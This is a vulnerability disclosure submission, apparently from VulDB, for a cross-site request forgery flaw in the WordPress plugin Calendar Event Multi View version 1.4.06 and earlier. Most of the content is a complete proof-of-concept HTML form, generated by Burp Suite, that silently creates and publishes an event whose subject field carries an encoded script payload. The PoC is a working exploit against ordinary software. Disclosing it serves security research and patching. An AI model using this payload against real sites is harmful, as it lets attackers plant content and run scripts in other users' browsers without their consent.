Submit #43713: Cross-site Request Forgery (CSRF) vulnerability in Calendar Event Multi View plugin <=1.4.06 at WordPress.info

TitelCross-site Request Forgery (CSRF) vulnerability in Calendar Event Multi View plugin <=1.4.06 at WordPress.
Beschreibung# Exploit Title: Cross-site Request Forgery (CSRF) vulnerability in Calendar Event Multi View plugin <=1.4.06 at WordPress. # Exploit Author: Mostafa Farzaneh (Mr.Pyweb) # Web Site: https://wordpress.dwbooster.com/calendars/cp-multi-view-calendar # Software Homepage: https://wordpress.org/plugins/cp-multi-view-calendar/ # Version : 1.4.06 # Tested on: Windows 10 # Category: WebApp # Date: 2022-05-25 # Description: Cross-site Request Forgery (CSRF) vulnerability has been identified in Calendar Event Multi View plugin that allows an attacker to create an event and published on site. POC and exploit code: <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://target.com/wp/?cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&calid=1&month_index=1&method=adddetails&id=2" method="POST"> <input type="hidden" name="Subject" value="&lt;script&gt;alert&#40;origin&#41;&lt;&#47;script&gt;" /> <input type="hidden" name="colorvalue" value="&#35;C60" /> <input type="hidden" name="rrule" value="" /> <input type="hidden" name="rruleType" value="" /> <input type="hidden" name="stpartdate" value="05&#47;10&#47;2022" /> <input type="hidden" name="stparttime" value="00&#58;00" /> <input type="hidden" name="etpartdate" value="05&#47;16&#47;2022" /> <input type="hidden" name="etparttime" value="00&#58;00" /> <input type="hidden" name="stpartdatelast" value="05&#47;10&#47;2022" /> <input type="hidden" name="etpartdatelast" value="05&#47;16&#47;2022" /> <input type="hidden" name="stparttimelast" value="" /> <input type="hidden" name="etparttimelast" value="" /> <input type="hidden" name="IsAllDayEvent" value="1" /> <input type="hidden" name="Location" value="CSRF" /> <input type="hidden" name="Description" value="CSRF " /> <input type="hidden" name="timezone" value="4&#46;5" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Benutzer
 pyweb-security (UID 11883)
Einreichung15.08.2022 12:20 (vor 4 Jahren)
Moderieren16.08.2022 15:53 (1 day later)
StatusAkzeptiert
VulDB Eintrag206488 [Calendar Event Multi View Plugin auf WordPress Cross Site Request Forgery]
Punkte17

ZurückÜbersichtWeiter

Might our Artificial Intelligence support you?

Check our Alexa App!